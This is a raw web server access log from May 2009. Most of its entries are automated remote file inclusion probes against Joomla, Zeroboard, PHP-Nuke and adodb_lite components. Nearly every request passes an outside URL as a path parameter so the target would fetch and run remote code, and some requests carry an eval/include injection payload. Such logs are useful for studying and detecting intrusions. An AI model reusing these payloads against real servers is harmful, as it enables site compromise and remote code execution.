203.114.112.155 - - [12/May/2009:23:50:19 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
88.191.48.81 - - [12/May/2009:23:50:25 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
203.114.112.155 - - [12/May/2009:23:50:29 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:23:50:33 -0500] "GET /logs/access_log.1143763200 HTTP/1.1" 200 993 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.253.245.211 - - [12/May/2009:23:50:42 -0500] "GET /logs/index.php?option=com_joomfish&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
145.253.245.211 - - [12/May/2009:23:50:45 -0500] "GET /index.php?option=com_joomfish&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
85.18.117.101 - - [12/May/2009:23:53:25 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.18.117.101 - - [12/May/2009:23:53:25 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.18.117.101 - - [12/May/2009:23:53:25 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.18.117.101 - - [12/May/2009:23:53:25 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:53:53 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.19.228.18 - - [12/May/2009:23:54:18 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
88.84.128.40 - - [12/May/2009:23:55:09 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:23:55:10 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
85.18.117.101 - - [12/May/2009:23:55:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
85.18.117.101 - - [12/May/2009:23:55:57 -0500] "GET //skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.18.117.101 - - [12/May/2009:23:55:57 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.18.117.101 - - [12/May/2009:23:55:57 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.115.89.68 - - [12/May/2009:23:56:26 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.115.89.68 - - [12/May/2009:23:56:26 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.115.89.68 - - [12/May/2009:23:56:26 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.115.89.68 - - [12/May/2009:23:56:26 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.117.191.71 - - [12/May/2009:23:58:20 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.65"
216.117.191.71 - - [12/May/2009:23:58:20 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
88.191.103.144 - - [12/May/2009:23:59:45 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:23:59:46 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.825"
87.106.135.14 - - [13/May/2009:00:00:22 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:00:23 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:00:53 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:00:53 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
67.19.228.18 - - [13/May/2009:00:01:26 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:01:33 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:01:33 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:01:33 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.239.76.25 - - [13/May/2009:00:01:44 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.239.76.25 - - [13/May/2009:00:01:44 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
222.239.76.25 - - [13/May/2009:00:01:44 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.38.16.54 - - [13/May/2009:00:03:00 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ssdnb.net/bbs/vo.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.826"
218.185.20.88 - - [13/May/2009:00:04:16 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:04:16 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:04:16 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:04:26 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
203.22.204.193 - - [13/May/2009:00:04:28 -0500] "GET /logs//nuke/htmltonuke.php?id=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
203.22.204.193 - - [13/May/2009:00:04:28 -0500] "GET //nuke/htmltonuke.php?id=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.76"
203.22.204.193 - - [13/May/2009:00:04:40 -0500] "GET /logs//nuke/htmltonuke.php?id=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.76"
203.22.204.193 - - [13/May/2009:00:04:40 -0500] "GET //nuke/htmltonuke.php?id=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.76"
66.249.67.180 - - [13/May/2009:00:06:24 -0500] "GET /logs/access_log.1177200000 HTTP/1.1" 200 459 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.185.20.88 - - [13/May/2009:00:06:50 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:06:50 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:06:50 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.75.4.169 - - [13/May/2009:00:08:37 -0500] "GET /logs/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [13/May/2009:00:08:38 -0500] "GET /index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
145.253.245.211 - - [13/May/2009:00:08:54 -0500] "GET /logs/errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:08:56 -0500] "GET /errors.php?error=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
82.159.191.105 - - [13/May/2009:00:09:51 -0500] "GET //nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:09:51 -0500] "GET /logs//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:09:52 -0500] "GET /logs/access_log.1239494400//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:09:52 -0500] "GET /logs/access_log.1238112000//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:10:09 -0500] "GET /logs/access_log.1239494400//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:10:09 -0500] "GET /logs//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:10:09 -0500] "GET //nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:10:30 -0500] "GET /logs/access_log.1238112000//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:10:58 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:10:58 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:10:58 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:11:02 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:11:12 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:11:12 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:11:12 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.119.158.133 - - [13/May/2009:00:11:16 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
82.159.191.105 - - [13/May/2009:00:11:38 -0500] "GET /logs/access_log.1240012800//nuke/htmltonuke.php?id=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:00:11:43 -0500] "GET /logs/access_log.1168560000 HTTP/1.1" 200 1012 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
113.29.225.7 - - [13/May/2009:00:12:41 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:00:12:41 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
85.18.117.101 - - [13/May/2009:00:12:58 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:00:13:01 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:00:13:19 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
113.29.225.7 - - [13/May/2009:00:14:00 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:00:14:00 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
202.75.4.169 - - [13/May/2009:00:14:21 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [13/May/2009:00:14:22 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
199.120.90.222 - - [13/May/2009:00:14:30 -0500] "GET /logs//errors.php?error=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
199.120.90.222 - - [13/May/2009:00:14:30 -0500] "GET //errors.php?error=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
199.120.90.222 - - [13/May/2009:00:14:34 -0500] "GET /logs//errors.php?error=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [13/May/2009:00:14:34 -0500] "GET //errors.php?error=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
199.120.90.222 - - [13/May/2009:00:14:50 -0500] "GET /logs//errors.php?error=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
199.120.90.222 - - [13/May/2009:00:14:50 -0500] "GET //errors.php?error=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
202.75.4.169 - - [13/May/2009:00:15:49 -0500] "GET /logs/index.php?option=com_joomfish&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [13/May/2009:00:15:50 -0500] "GET /index.php?option=com_joomfish&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
218.185.20.88 - - [13/May/2009:00:16:36 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:16:55 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:16:55 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:16:55 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:17:01 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:00:17:02 -0500] "GET /logs/access_log.1170547200 HTTP/1.1" 200 44082 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.212.195 - - [13/May/2009:00:17:33 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:17:37 -0500] "GET /logs/access_log.1239494400//nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:17:37 -0500] "GET //nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:17:40 -0500] "GET /logs//nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:17:45 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:17:45 -0500] "GET /logs/access_log.1238112000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:17:57 -0500] "GET /logs/access_log.1238112000//nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:18:00 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:18:00 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:18:00 -0500] "GET /logs/access_log.1240272000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.48.81 - - [13/May/2009:00:18:06 -0500] "GET /logs/access_log.1239580800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:18:09 -0500] "GET /logs/access_log.1239494400//nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:18:09 -0500] "GET /logs//nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:18:09 -0500] "GET //nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [13/May/2009:00:18:29 -0500] "GET /logs/access_log.1238112000//nuke/htmltonuke.php?id=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:19:38 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:19:38 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.93.90.162 - - [13/May/2009:00:19:38 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
